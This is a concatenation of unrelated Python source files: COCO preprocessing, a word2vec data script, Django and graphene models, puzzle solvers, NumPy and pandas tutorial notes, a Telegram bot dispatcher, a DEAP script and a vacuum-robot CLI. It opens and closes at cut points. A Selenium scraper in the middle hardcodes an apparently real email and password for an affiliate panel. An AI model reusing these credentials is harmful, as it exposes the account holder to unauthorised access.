pgons, bboxImgs, colors, alt_segs = getPgonsBboxImgsColorsAltSegs(img, anns, polygons)
return pgons, object_labels, alt_segs, colors, bboxImgs
# Get categories with largest number of images to use
def get_largest_categories(coco, num_categories):
"""
Returns:
list of {'supercategory': 'person', 'id': 1, 'name': 'person'}"""
img_per_category = [(i, len(coco.getImgIds(catIds=i))) for i in range(90)]
img_per_category.sort(key=lambda x: x[1])
usedCatImgs = img_per_category[-num_categories:] # list of (catId, numImgs) tuples
# number of images available for smallest used cat(egory)
minNumImgs = usedCatImgs[0][1]
used_ids = [tup[0] for tup in usedCatImgs] # list of catIds used
used_categories = coco.loadCats(coco.getCatIds(catIds=used_ids))
cat_names = [cat['name'] for cat in used_categories]
print('{} COCO categories used: \n{}\n'.format(
len(used_categories), ' '.join(cat_names)))
return used_categories
class CocoImage():
def __init__(self, image, label, config, polygon):
self.data = image
self.label = label
self.config = config
self.polygon = polygon
@staticmethod
def preprocess(coco, directory, all_img_info, used_ids, filter_fn=lambda x: True):
"""
Returns:
list of CocoImage objects for each object segment"""
all_coco_imgs = []
for img_info in all_img_info:
I = io.imread(os.path.join(directory, img_info["file_name"]))
# Get obj seg/bbox annotations of img
annIds = coco.getAnnIds(
imgIds=img_info['id'], catIds=used_ids, iscrowd=None)
anns = coco.loadAnns(annIds)
all_subimage_data = getPolygonsLabelsMasksColorsBboxImgs(coco, I, anns)
assert all(len(ret) == len(all_subimage_data[0]) for ret in all_subimage_data)
polygons, object_labels, alt_segs, colors, bboxImgs = all_subimage_data
# In order to call show_gt_mask(*config)
configs = list(zip(bboxImgs, polygons, colors))
# In order to check which points are in the Shapely Polygon later
shapelyPolygons = [Pgon(pairwise_group(seg[0])) for seg in alt_segs]
all_coco_imgs += [CocoImage(*args) for args in
zip(bboxImgs, object_labels, configs, shapelyPolygons)
if filter_fn(args[0])]
return all_coco_imgs
# @staticmethod
# def _preprocess(coco, img_path, img_info, used_ids):
# """Process images into a form that can be input into Keras Models.
# Args:
# coco (COCO object): coco object of portion of the coco dataset used
# img_imnfo (dict): image to preprocess
# used_ids (array): array of ints indicating which classes of coco are being used
# Returns:
# TODO(rliaw): Should return 1 CocoImage with multiple attributes.
# bboxImgs (array): array of bounding box images for each object in the image
# object_labels (array): labels for each object in bboxImgs
# configs (array): configs for ground truth segmentation for each object
# i.e. each config in configs is used like: show_gt_mask(*config)
# shapelyPolygons (array): Shapely Polygons of the ground truth segmentation for each object
# """
# I = io.imread(img_path)
# # Get obj seg/bbox annotations of img
# annIds = coco.getAnnIds(imgIds=img_info['id'], catIds=used_ids, iscrowd=None)
# anns = coco.loadAnns(annIds)
# polygons, object_labels, alt_segs, colors, bboxImgs = getPolygonsLabelsMasksColorsBboxImgs(coco, I, anns)
# x = len(polygons)
# assert len(object_labels) == x, (x, len(object_labels))
# assert len(alt_segs) == x, (x, len(alt_segs))
# assert len(colors) == x, (x, len(colors))
# assert len(bboxImgs) == x, (x, len(bboxImgs))
# # In order to call show_gt_mask(*config)
# configs = []
# for i in range(len(polygons)):
# configs.append((bboxImgs[i], polygons[i], colors[i]))
# # In order to check which points are in the Shapely Polygon later
# shapelyPolygons = []
# for seg in alt_segs:
# shapelyPolygons.append(Pgon(pairwise_group(seg[0])))
# assert len(configs) == len(shapelyPolygons)
# return bboxImgs, object_labels, configs, shapelyPolygons |
# -*- coding: utf-8 -*-
"""
参考链接:
python初步实现word2vec:http://blog.csdn.net/xiaoquantouer/article/details/53583980
Google Word2vec 学习手札: http://blog.csdn.net/MebiuW/article/details/52295138
"""
import sys
import chardet
import re
text_path = "/Users/sunlu/Documents/数据集/搜狗实验室/搜狐新闻数据(SogouCS)/news_sohusite_xml.smarty.dat"
f = open(text_path,'r')
# data = f.read()
# print chardet.detect(data)
# line1 = f.readline().decode('utf-8')
# print line1
line2 = f.readlines()
f2 = open("news_sohusite.txt", 'w')
for l in line2:
# print l.decode('gb2312', 'ignore')
# compile提高正则匹配效率
reg = re.compile(r'<content>(.*?)</content>')
# 返回list列表
items = re.findall(reg, l.decode('gb2312', 'ignore').encode("utf-8"))
for item in items:
print item
if len(item) >= 4 :
f2.write(item + '\n')
|
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# DNSServer model
# ---------------------------------------------------------------------
# Copyright (C) 2007-2013 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Django modules
from django.utils.translation import ugettext_lazy as _
from django.db import models
# NOC modules
from noc.core.model.fields import INETField, DocumentReferenceField
from noc.main.models.sync import Sync
class DNSServer(models.Model):
"""
DNS Server is an database object representing real DNS server.
:param name: Unique DNS server name (usually, FQDN)
:param ip: Server's IP address
:param description: Optional description
:param sync_channel: Synchronization channel name
"""
class Meta:
verbose_name = _("DNS Server")
verbose_name_plural = _("DNS Servers")
db_table = "dns_dnsserver"
app_label = "dns"
name = models.CharField(_("Name"), max_length=64, unique=True)
ip = INETField(_("IP"), null=True, blank=True)
description = models.CharField(_("Description"), max_length=128,
blank=True, null=True)
sync = DocumentReferenceField(Sync, blank=True, null=True)
def __unicode__(self):
return self.name
|
from utils import read_input
import math
raw = read_input.read_input_strings('day18')
def evaluate_precedence(expression):
return math.prod([sum([int(number) for number in group.split('+')]) for group in expression.split('*')])
def evaluate_sequential(expression):
result = 0
pointer = 0
operator = '+'
numbers = []
while pointer < len(expression):
current = expression[pointer]
if current == '+' or current == '*':
if operator == '+':
result += int(''.join(numbers))
else:
result *= int(''.join(numbers))
operator = current
numbers.clear()
else:
numbers.append(current)
pointer += 1
if len(numbers) > 0:
if operator == '+':
result += int(''.join(numbers))
else:
result *= int(''.join(numbers))
return result
def evaluate(expression, reduce):
formatted = expression.replace(' ', '')
if '(' in formatted:
result = []
pointer = 0
while pointer < len(formatted):
current = formatted[pointer]
if current == '(':
left = 1
start = pointer + 1
end = pointer + 1
while end < len(formatted):
if formatted[end] == '(':
left += 1
if formatted[end] == ')':
left -= 1
if left == 0:
break
end += 1
result.append(str(evaluate(formatted[start:end], reduce)))
pointer = end + 1
else:
result.append(formatted[pointer])
pointer += 1
return evaluate(''.join(result), reduce)
else:
return reduce(formatted)
def part_one():
summary = sum([evaluate(expression, evaluate_sequential) for expression in raw])
print(f'The summary of all expressions is {summary}.')
def part_two():
summary = sum([evaluate(expression, evaluate_precedence) for expression in raw])
print(f'The summary of all expressions is {summary}.')
if __name__ == '__main__':
part_one()
part_two()
|
## Goal: get the thread that is top 100 popular: by views, by replies
## Write function to sort by reviews or replies
## .csv file to contain: link_to_thread, name_of_thread, views, replies, last_post_time, last_post_date
import time
import datetime as dt
import pandas as pd
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait, Select
def init_driver():
driver = webdriver.Chrome()
driver.maximize_window()
driver.wait = WebDriverWait(driver, 3)
return driver
def lookup_commissions(driver, sd, ed):
# Log in first
driver.get('https://www.affiliatly.com/af-102171/affiliate.panel')
user = driver.find_element_by_xpath("//input[@name='email']")
password = driver.find_element_by_xpath("//input[@name='password']")
user.clear()
user.send_keys("mwolla@verticalscope.com")
password.clear()
password.send_keys("Vscope700!")
driver.find_element_by_xpath("//button[@name='login']").click()
# date picker
datepicker_from = driver.find_element_by_xpath("//input[@name='date_from']")
driver.execute_script("arguments[0].value='"+sd+"';", datepicker_from)
driver.execute_script(sd, datepicker_from)
print('from', datepicker_from.get_attribute('value'))
datepicker_to = driver.find_element_by_xpath("//input[@name='date_to']")
driver.execute_script("arguments[0].value='"+ed+"';", datepicker_to)
print('now', datepicker_to.get_attribute('value'))
# Go to conversions
#driver.find_element_by_link_text("Show").click()
driver.find_element_by_xpath("//button[@class='btn btn-success show_summary_data']").click()
# now get conversion data
post_dict = {'date':[], 'visitors': [], 'order': [], 'earnings': [], 'conversions':[]}
rows = driver.find_element_by_xpath('//div[@class="table_responsive_holder"]').find_elements_by_tag_name('tr')
cols = driver.find_element_by_xpath('//div[@class="table_responsive_holder"]').find_elements_by_tag_name('td')
print('here', rows[1].find_elements_by_tag_name('td')[0].text)
for i in range(1,len(rows)):
#for col in cols:
print('here', rows[i].find_elements_by_tag_name('td')[0].text)
post_dict['date'].append(rows[i].find_elements_by_tag_name('td')[0].text)
post_dict['visitors'].append(rows[i].find_elements_by_tag_name('td')[1].text)
post_dict['order'].append(rows[i].find_elements_by_tag_name('td')[2].text)
post_dict['earnings'].append(rows[i].find_elements_by_tag_name('td')[3].text)
post_dict['conversions'].append(rows[i].find_elements_by_tag_name('td')[4].text)
print(post_dict)
return post_dict
def process_df(post_dict):
post_dict['date'] = (post_dict.date.apply(lambda x:pd.to_datetime(x)))
post_dict['earnings'] = (post_dict.commission.str.replace('$', ''))
post_dict['earnings'] = post_dict['commission'].astype(float)
post_dict['visitors'] = post_dict['visitors'].astype(float)
return post_dict
if __name__ == '__main__':
driver = init_driver()
ed = (dt.datetime.now() - dt.timedelta(days=1))
sd = (ed - dt.timedelta(days=65)).strftime('%m/%d/%Y')
ed = ed.strftime('%m/%d/%Y')
print('sd', sd)
print('ed', ed)
order_data = lookup_commissions(driver, sd, ed)
order_data['site'] = 'thesleepjudge.com'
print(order_data)
order_data = pd.DataFrame.from_dict(order_data)
order_data = process_df(order_data)
sorted_order = order_data.sort_values('date', ascending=False)
order_data.to_csv('commission.csv')
driver.close() |
class Solution:
def kthSmallest(self, matrix: List[List[int]], k: int) -> int:
left = matrix[0][0]
right = matrix[-1][-1]
while left < right:
middle = (left + right) // 2
i = len(matrix) - 1
j = n = 0
while i >= 0 and j < len(matrix[0]):
if matrix[i][j] <= middle:
j += 1
n += i + 1
else:
i -= 1
if n >= k:
right = middle # <= right
else:
left = middle + 1 # >= left
return left
|
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyObjectType
from crm.apps.organization.models import Organization
class OrganizationType(SQLAlchemyObjectType):
class Meta:
model = Organization
interfaces = (relay.Node,)
name = model.__name__
|
"""
Udemy "Interactive Python Dashboards with Plotly and Dash Course
10/25/2020
"""
import numpy as np
# NumPy crash course.
mylist = [1, 2, 3, 4, 5, 6, 7]
print(np.array(mylist))
print(type(mylist))
# makes an array out of a list.
arr = np.array(mylist)
print(arr)
print(type(arr))
a = np.arange(0, 10)
print(a)
# range of numbers with a step of 2.
b = np.arange(0, 20, 2)
print(b)
# matrix or grid array of numbers.
# pass a tuple (5,5).
print(np.zeros((5,5)))
print(np.ones((3,5)))
# produces floating point numbers.
print(type(1.0))
print(type(1.))
# create a random array of integers.
print(np.random.randint(0,100))
# use tuple to make grid (7,7)
print(np.random.randint(0,100,(7,7)))
# array of numbers evenly spaced from 0 to 10, third number is how many spaces.
print(np.linspace(0,10,6))
print(np.linspace(0,10,101))
print(np.linspace(0,10,201))
# set random.seed() to get exact same random numbers each time or as another user.
np.random.seed(101)
print(np.random.randint(0,100,10))
# produce random array of 10 numbers between 0 and 200.
array = np.random.randint(0,200,10)
print(array)
# get data on array.
print(array.max())
print(array.min())
print(array.mean())
# location of max number
print(array.argmax())
print(array.argmin())
# make an array of numbers 0 to 99.
mat = np.arange(0,100)
print(mat)
# reshape into a matrix.
matrix = mat.reshape(10,10)
print(matrix)
# shortcut to above code.
# mat = np.arange(0,100).reshape(10,10)
# get number from matrix. Row then column (zero based index)
print(matrix[5,2])
# get whole column. column 2.
print(matrix[:,2])
# get whole row. row 2.
print(matrix[2,:])
# masking
# boolean values
print(matrix > 50)
# get matrix with only values greater than 50.
print(matrix[matrix>50])
# Pandas Crash Course
import pandas as pd
df = pd.read_csv('salaries.csv')
print(df)
# print just Salary.
print(df['Salary'])
# print two columns using a list. Passing a list into it, hence double brackets.
print(df[['Name','Salary']])
# get data from df. Ex: .min(), .max(), .mean()
print(df['Salary'].mean())
# conditional filtering.
# get boolean values (dtype: bool)
print(df['Age'] > 30)
# using bool to sort out data. Age > 30.
ser_of_bool = df['Age'] > 30
print(df[ser_of_bool])
# above code in one step.
print(df[df['Age'] > 30])
# other methods.
# get unique numbers.
print(df['Age'].unique())
# get number of unique numbers.
print(df['Age'].nunique())
# get columns.
print(df.columns)
# get info about df.
print(df.info())
# get statistical summary.
print(df.describe())
# get index info.
print(df.index)
# Combine numpy and pandas exercise
mat1 = np.arange(0,10).reshape(5,2)
print(mat1)
df1 = pd.DataFrame(data=mat1,columns=['2019','2020'],index=['JAN','FEB','MAR','APR','MAY'])
print(df1)
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the Dispatcher class."""
import logging
from functools import wraps
from inspect import getargspec
from threading import Thread, BoundedSemaphore, Lock, Event, current_thread
from re import match, split
from time import sleep
from telegram import (TelegramError, Update, NullHandler)
from telegram.updatequeue import Empty
H = NullHandler()
logging.getLogger(__name__).addHandler(H)
semaphore = None
async_threads = set()
""":type: set[Thread]"""
async_lock = Lock()
def run_async(func):
"""
Function decorator that will run the function in a new thread. A function
decorated with this will have to include **kwargs in their parameter list,
which will contain all optional parameters.
Args:
func (function): The function to run in the thread.
Returns:
function:
"""
# TODO: handle exception in async threads
# set a threading.Event to notify caller thread
@wraps(func)
def pooled(*pargs, **kwargs):
"""
A wrapper to run a thread in a thread pool
"""
result = func(*pargs, **kwargs)
semaphore.release()
with async_lock:
async_threads.remove(current_thread())
return result
@wraps(func)
def async_func(*pargs, **kwargs):
"""
A wrapper to run a function in a thread
"""
thread = Thread(target=pooled, args=pargs, kwargs=kwargs)
semaphore.acquire()
with async_lock:
async_threads.add(thread)
thread.start()
return thread
return async_func
class Dispatcher:
"""
This class dispatches all kinds of updates to its registered handlers.
A handler is a function that usually takes the following parameters
bot:
The telegram.Bot instance that received the message
update:
The update that should be handled by the handler
Error handlers take an additional parameter
error:
The TelegramError instance that was raised during processing the
update
All handlers, except error handlers, can also request more information by
appending one or more of the following arguments in their argument list for
convenience
update_queue:
The Queue instance which contains all new updates and is
processed by the Dispatcher. Be careful with this - you might
create an infinite loop.
args:
If the update is an instance str or telegram.Update, this will be
a list that contains the content of the message split on spaces,
except the first word (usually the command).
Example: '/add item1 item2 item3' -> ['item1', 'item2', 'item3']
For updates that contain inline queries, they will contain the
whole query split on spaces.
For other updates, args will be None
In some cases handlers may need some context data to process the update. To
procedure just queue in update_queue.put(update, context=context) or
processUpdate(update,context=context).
context:
Extra data for handling updates.
For regex-based handlers, you can also request information about the match.
For all other handlers, these will be None
groups:
A tuple that contains the result of
re.match(matcher, ...).groups()
groupdict:
A dictionary that contains the result of
re.match(matcher, ...).groupdict()
Args:
bot (telegram.Bot): The bot object that should be passed to the
handlers
update_queue (telegram.UpdateQueue): The synchronized queue that will
contain the updates.
"""
def __init__(self, bot, update_queue, workers=4, exception_event=None):
self.bot = bot
self.update_queue = update_queue
self.telegram_message_handlers = []
self.telegram_inline_handlers = []
self.telegram_command_handlers = {}
self.telegram_regex_handlers = {}
self.string_regex_handlers = {}
self.string_command_handlers = {}
self.type_handlers = {}
self.unknown_telegram_command_handlers = []
self.unknown_string_command_handlers = []
self.error_handlers = []
self.logger = logging.getLogger(__name__)
self.running = False
self.__stop_event = Event()
self.__exception_event = exception_event or Event()
global semaphore
if not semaphore:
semaphore = BoundedSemaphore(value=workers)
else:
self.logger.info("Semaphore already initialized, skipping.")
def start(self):
"""
Thread target of thread 'dispatcher'. Runs in background and processes
the update queue.
"""
if self.running:
self.logger.warning('already running')
return
if self.__exception_event.is_set():
msg = 'reusing dispatcher after exception event is forbidden'
self.logger.error(msg)
raise TelegramError(msg)
self.running = True
self.logger.info('Dispatcher started')
while 1:
try:
# Pop update from update queue.
update, context = self.update_queue.get(True, 1, True)
except Empty:
if self.__stop_event.is_set():
self.logger.info('orderly stopping')
break
elif self.__stop_event.is_set():
self.logger.critical(
'stopping due to exception in another thread')
break
continue
try:
self.processUpdate(update, context)
self.logger.debug('Processed Update: %s with context %s'
% (update, context))
# Dispatch any errors
except TelegramError as te:
self.logger.warn("Error was raised while processing Update.")
try:
self.dispatchError(update, te)
# Log errors in error handlers
except:
self.logger.exception("An uncaught error was raised while "
"handling the error")
# All other errors should not stop the thread, just print them
except:
self.logger.exception("An uncaught error was raised while "
"processing an update")
self.running = False
self.logger.info('Dispatcher thread stopped')
def stop(self):
"""
Stops the thread
"""
if self.running:
self.__stop_event.set()
while self.running:
sleep(0.1)
self.__stop_event.clear()
def processUpdate(self, update, context=None):
"""
Processes a single update.
Args:
update (any):
"""
handled = False
# Custom type handlers
for t in self.type_handlers:
if isinstance(update, t):
self.dispatchType(update, context)
handled = True
# string update
if type(update) is str and update.startswith('/'):
self.dispatchStringCommand(update, context)
handled = True
elif type(update) is str:
self.dispatchRegex(update, context)
handled = True
# An error happened while polling
if isinstance(update, TelegramError):
self.dispatchError(None, update)
handled = True
# Telegram update (regex)
if isinstance(update, Update) and update.message is not None:
self.dispatchRegex(update, context)
handled = True
# Telegram update (command)
if update.message.text.startswith('/'):
self.dispatchTelegramCommand(update, context)
# Telegram update (message)
else:
self.dispatchTelegramMessage(update, context)
handled = True
elif isinstance(update, Update) and \
(update.inline_query is not None or
update.chosen_inline_result is not None):
self.dispatchTelegramInline(update, context)
handled = True
# Update not recognized
if not handled:
self.dispatchError(update, TelegramError(
"Received update of unknown type %s" % type(update)))
# Add Handlers
def addTelegramMessageHandler(self, handler):
"""
Registers a message handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.telegram_message_handlers.append(handler)
def addTelegramInlineHandler(self, handler):
"""
Registers an inline query handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.telegram_inline_handlers.append(handler)
def addTelegramCommandHandler(self, command, handler):
"""
Registers a command handler in the Dispatcher.
Args:
command (str): The command keyword that this handler should be
listening to.
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if command not in self.telegram_command_handlers:
self.telegram_command_handlers[command] = []
self.telegram_command_handlers[command].append(handler)
def addTelegramRegexHandler(self, matcher, handler):
"""
Registers a regex handler in the Dispatcher. If handlers will be
called if re.match(matcher, update.message.text) is True.
Args:
matcher (str/__Regex): A regex string or compiled regex object that
matches on messages that handler should be listening to
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if matcher not in self.telegram_regex_handlers:
self.telegram_regex_handlers[matcher] = []
self.telegram_regex_handlers[matcher].append(handler)
def addStringCommandHandler(self, command, handler):
"""
Registers a string-command handler in the Dispatcher.
Args:
command (str): The command keyword that this handler should be
listening to.
handler (function): A function that takes (Bot, str, *args) as
arguments.
"""
if command not in self.string_command_handlers:
self.string_command_handlers[command] = []
self.string_command_handlers[command].append(handler)
def addStringRegexHandler(self, matcher, handler):
"""
Registers a regex handler in the Dispatcher. If handlers will be
called if re.match(matcher, string) is True.
Args:
matcher (str/__Regex): A regex string or compiled regex object that
matches on the string input that handler should be listening to
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if matcher not in self.string_regex_handlers:
self.string_regex_handlers[matcher] = []
self.string_regex_handlers[matcher].append(handler)
def addUnknownTelegramCommandHandler(self, handler):
"""
Registers a command handler in the Dispatcher, that will receive all
commands that have no associated handler.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.unknown_telegram_command_handlers.append(handler)
def addUnknownStringCommandHandler(self, handler):
"""
Registers a string-command handler in the Dispatcher, that will
receive all commands that have no associated handler.
Args:
handler (function): A function that takes (Bot, str, *args) as
arguments.
"""
self.unknown_string_command_handlers.append(handler)
def addErrorHandler(self, handler):
"""
Registers an error handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, TelegramError) as
arguments.
"""
self.error_handlers.append(handler)
def addTypeHandler(self, the_type, handler):
"""
Registers a type handler in the Dispatcher. This allows you to send
any type of object into the update queue.
Args:
the_type (type): The type this handler should listen to
handler (function): A function that takes (Bot, type, *args) as
arguments.
"""
if the_type not in self.type_handlers:
self.type_handlers[the_type] = []
self.type_handlers[the_type].append(handler)
# Remove Handlers
def removeTelegramMessageHandler(self, handler):
"""
De-registers a message handler.
Args:
handler (any):
"""
if handler in self.telegram_message_handlers:
self.telegram_message_handlers.remove(handler)
def removeTelegramInlineHandler(self, handler):
"""
De-registers an inline query handler.
Args:
handler (any):
"""
if handler in self.telegram_inline_handlers:
self.telegram_inline_handlers.remove(handler)
def removeTelegramCommandHandler(self, command, handler):
"""
De-registers a command handler.
Args:
command (str): The command
handler (any):
"""
if command in self.telegram_command_handlers \
and handler in self.telegram_command_handlers[command]:
self.telegram_command_handlers[command].remove(handler)
def removeTelegramRegexHandler(self, matcher, handler):
"""
De-registers a regex handler.
Args:
matcher (str/__Regex): The regex matcher object or string
handler (any):
"""
if matcher in self.telegram_regex_handlers \
and handler in self.telegram_regex_handlers[matcher]:
self.telegram_regex_handlers[matcher].remove(handler)
def removeStringCommandHandler(self, command, handler):
"""
De-registers a string-command handler.
Args:
command (str): The command
handler (any):
"""
if command in self.string_command_handlers \
and handler in self.string_command_handlers[command]:
self.string_command_handlers[command].remove(handler)
def removeStringRegexHandler(self, matcher, handler):
"""
De-registers a regex handler.
Args:
matcher (str/__Regex): The regex matcher object or string
handler (any):
"""
if matcher in self.string_regex_handlers \
and handler in self.string_regex_handlers[matcher]:
self.string_regex_handlers[matcher].remove(handler)
def removeUnknownTelegramCommandHandler(self, handler):
"""
De-registers an unknown-command handler.
Args:
handler (any):
"""
if handler in self.unknown_telegram_command_handlers:
self.unknown_telegram_command_handlers.remove(handler)
def removeUnknownStringCommandHandler(self, handler):
"""
De-registers an unknown-command handler.
Args:
handler (any):
"""
if handler in self.unknown_string_command_handlers:
self.unknown_string_command_handlers.remove(handler)
def removeErrorHandler(self, handler):
"""
De-registers an error handler.
Args:
handler (any):
"""
if handler in self.error_handlers:
self.error_handlers.remove(handler)
def removeTypeHandler(self, the_type, handler):
"""
De-registers a type handler.
Args:
handler (any):
"""
if the_type in self.type_handlers \
and handler in self.type_handlers[the_type]:
self.type_handlers[the_type].remove(handler)
def dispatchTelegramCommand(self, update, context=None):
"""
Dispatches an update that contains a command.
Args:
command (str): The command keyword
update (telegram.Update): The Telegram update that contains the
command
"""
command = split('\W', update.message.text[1:])[0]
if command in self.telegram_command_handlers:
self.dispatchTo(self.telegram_command_handlers[command], update,
context=context)
else:
self.dispatchTo(self.unknown_telegram_command_handlers, update,
context=context)
def dispatchRegex(self, update, context=None):
"""
Dispatches an update to all string or telegram regex handlers that
match the string/message content.
Args:
update (str, Update): The update that should be checked for matches
"""
if isinstance(update, Update):
handlers = self.telegram_regex_handlers
to_match = update.message.text
elif isinstance(update, str):
handlers = self.string_regex_handlers
to_match = update
for matcher in handlers:
m = match(matcher, to_match)
if m:
for handler in handlers[matcher]:
self.call_handler(handler,
update,
groups=m.groups(),
groupdict=m.groupdict(),
context=context)
def dispatchStringCommand(self, update, context=None):
"""
Dispatches a string-update that contains a command.
Args:
update (str): The string input
"""
command = update.split(' ')[0][1:]
if command in self.string_command_handlers:
self.dispatchTo(self.string_command_handlers[command], update,
context=context)
else:
self.dispatchTo(self.unknown_string_command_handlers, update,
context=context)
def dispatchType(self, update, context=None):
"""
Dispatches an update of any type.
Args:
update (any): The update
"""
for t in self.type_handlers:
if isinstance(update, t):
self.dispatchTo(self.type_handlers[t], update, context=context)
def dispatchTelegramMessage(self, update, context=None):
"""
Dispatches an update that contains a regular message.
Args:
update (telegram.Update): The Telegram update that contains the
message.
"""
self.dispatchTo(self.telegram_message_handlers, update,
context=context)
def dispatchTelegramInline(self, update, context=None):
"""
Dispatches an update that contains an inline update.
Args:
update (telegram.Update): The Telegram update that contains the
message.
"""
self.dispatchTo(self.telegram_inline_handlers, update, context=None)
def dispatchError(self, update, error):
"""
Dispatches an error.
Args:
update (any): The pdate that caused the error
error (telegram.TelegramError): The Telegram error that was raised.
"""
for handler in self.error_handlers:
handler(self.bot, update, error)
def dispatchTo(self, handlers, update, **kwargs):
"""
Dispatches an update to a list of handlers.
Args:
handlers (list): A list of handler-functions.
update (any): The update to be dispatched
"""
for handler in handlers:
self.call_handler(handler, update, **kwargs)
def call_handler(self, handler, update, **kwargs):
"""
Calls an update handler. Checks the handler for keyword arguments and
fills them, if possible.
Args:
handler (function): An update handler function
update (any): An update
"""
target_kwargs = {}
fargs = getargspec(handler).args
'''
async handlers will receive all optional arguments, since we can't
their argument list.
'''
is_async = 'pargs' == getargspec(handler).varargs
if is_async or 'update_queue' in fargs:
target_kwargs['update_queue'] = self.update_queue
if is_async or 'args' in fargs:
if isinstance(update, Update) and update.message:
args = update.message.text.split(' ')[1:]
elif isinstance(update, Update) and update.inline_query:
args = update.inline_query.query.split(' ')
elif isinstance(update, str):
args = update.split(' ')[1:]
else:
args = None
target_kwargs['args'] = args
if is_async or 'groups' in fargs:
target_kwargs['groups'] = kwargs.get('groups', None)
if is_async or 'groupdict' in fargs:
target_kwargs['groupdict'] = kwargs.get('groupdict', None)
if is_async or 'context' in fargs:
target_kwargs['context'] = kwargs.get('context', None)
handler(self.bot, update, **target_kwargs)
|
import random
import math
import numpy
import operator
from deap import creator, base, tools, algorithms, gp
from GAToolbox import get_toolbox
def main():
# list all the functions to analyse
functions = [math.sin]
# create the toolbox
toolbox = get_toolbox(functions[0])
random.seed(318)
# create a new population
pop = toolbox.population(n=300)
hof = tools.HallOfFame(30)
# collect some statistics
stats_fit = tools.Statistics(lambda ind: ind.fitness.values)
stats_size = tools.Statistics(len)
mstats = tools.MultiStatistics(fitness=stats_fit, size=stats_size)
mstats.register("avg", numpy.mean)
mstats.register("std", numpy.std)
mstats.register("min", numpy.min)
mstats.register("max", numpy.max)
# do the evolution
pop, log = algorithms.eaSimple(pop, toolbox, 0.5, 0.1, 40, stats=mstats,
halloffame=hof, verbose=True)
# print(log)
# print the Hall of Fame together with their fitness value
for ind in hof:
print('%.4f'%(ind.fitness.getValues())[0], ':', ind)
return pop, log, hof
if __name__ == "__main__":
main()
|
# -*- coding: UTF-8 -*-
import ast
import json
import logging
import pathlib
import sys
import threading
import time
from pprint import pformat as pf
from typing import Any # noqa: F401
import click
import pretty_cron
from appdirs import user_cache_dir
from tqdm import tqdm
import miio # noqa: E402
from miio.click_common import (ExceptionHandlerGroup, validate_ip,
validate_token, )
from .device import UpdateState
from .updater import OneShotServer
_LOGGER = logging.getLogger(__name__)
pass_dev = click.make_pass_decorator(miio.Device, ensure=True)
@click.group(invoke_without_command=True, cls=ExceptionHandlerGroup)
@click.option('--ip', envvar="MIROBO_IP", callback=validate_ip)
@click.option('--token', envvar="MIROBO_TOKEN", callback=validate_token)
@click.option('-d', '--debug', default=False, count=True)
@click.option('--id-file', type=click.Path(dir_okay=False, writable=True),
default=user_cache_dir('python-miio') + '/python-mirobo.seq')
@click.version_option()
@click.pass_context
def cli(ctx, ip: str, token: str, debug: int, id_file: str):
"""A tool to command Xiaomi Vacuum robot."""
if debug:
logging.basicConfig(level=logging.DEBUG)
_LOGGER.info("Debug mode active")
else:
logging.basicConfig(level=logging.INFO)
# if we are scanning, we do not try to connect.
if ctx.invoked_subcommand == "discover":
ctx.obj = "discover"
return
if ip is None or token is None:
click.echo("You have to give ip and token!")
sys.exit(-1)
start_id = manual_seq = 0
try:
with open(id_file, 'r') as f:
x = json.load(f)
start_id = x.get("seq", 0)
manual_seq = x.get("manual_seq", 0)
_LOGGER.debug("Read stored sequence ids: %s", x)
except (FileNotFoundError, TypeError, ValueError):
pass
vac = miio.Vacuum(ip, token, start_id, debug)
vac.manual_seqnum = manual_seq
_LOGGER.debug("Connecting to %s with token %s", ip, token)
ctx.obj = vac
if ctx.invoked_subcommand is None:
ctx.invoke(status)
cleanup(vac, id_file=id_file)
@cli.resultcallback()
@pass_dev
def cleanup(vac: miio.Vacuum, **kwargs):
if vac.ip is None: # dummy Device for discovery, skip teardown
return
id_file = kwargs['id_file']
seqs = {'seq': vac.raw_id, 'manual_seq': vac.manual_seqnum}
_LOGGER.debug("Writing %s to %s", seqs, id_file)
path_obj = pathlib.Path(id_file)
dir = path_obj.parents[0]
try:
dir.mkdir(parents=True)
except FileExistsError:
pass # after dropping py3.4 support, use exist_ok for mkdir
with open(id_file, 'w') as f:
json.dump(seqs, f)
@cli.command()
@click.option('--handshake', type=bool, default=False)
def discover(handshake):
"""Search for robots in the network."""
if handshake:
miio.Vacuum.discover()
else:
miio.Discovery.discover_mdns()
@cli.command()
@pass_dev
def status(vac: miio.Vacuum):
"""Returns the state information."""
res = vac.status()
if not res:
return # bail out
if res.error_code:
click.echo(click.style("Error: %s !" % res.error,
bold=True, fg='red'))
click.echo(click.style("State: %s" % res.state, bold=True))
click.echo("Battery: %s %%" % res.battery)
click.echo("Fanspeed: %s %%" % res.fanspeed)
click.echo("Cleaning since: %s" % res.clean_time)
click.echo("Cleaned area: %s m²" % res.clean_area)
# click.echo("DND enabled: %s" % res.dnd)
# click.echo("Map present: %s" % res.map)
# click.echo("in_cleaning: %s" % res.in_cleaning)
@cli.command()
@pass_dev
def consumables(vac: miio.Vacuum):
"""Return consumables status."""
res = vac.consumable_status()
click.echo("Main brush: %s (left %s)" % (res.main_brush,
res.main_brush_left))
click.echo("Side brush: %s (left %s)" % (res.side_brush,
res.side_brush_left))
click.echo("Filter: %s (left %s)" % (res.filter,
res.filter_left))
click.echo("Sensor dirty: %s (left %s)" % (res.sensor_dirty,
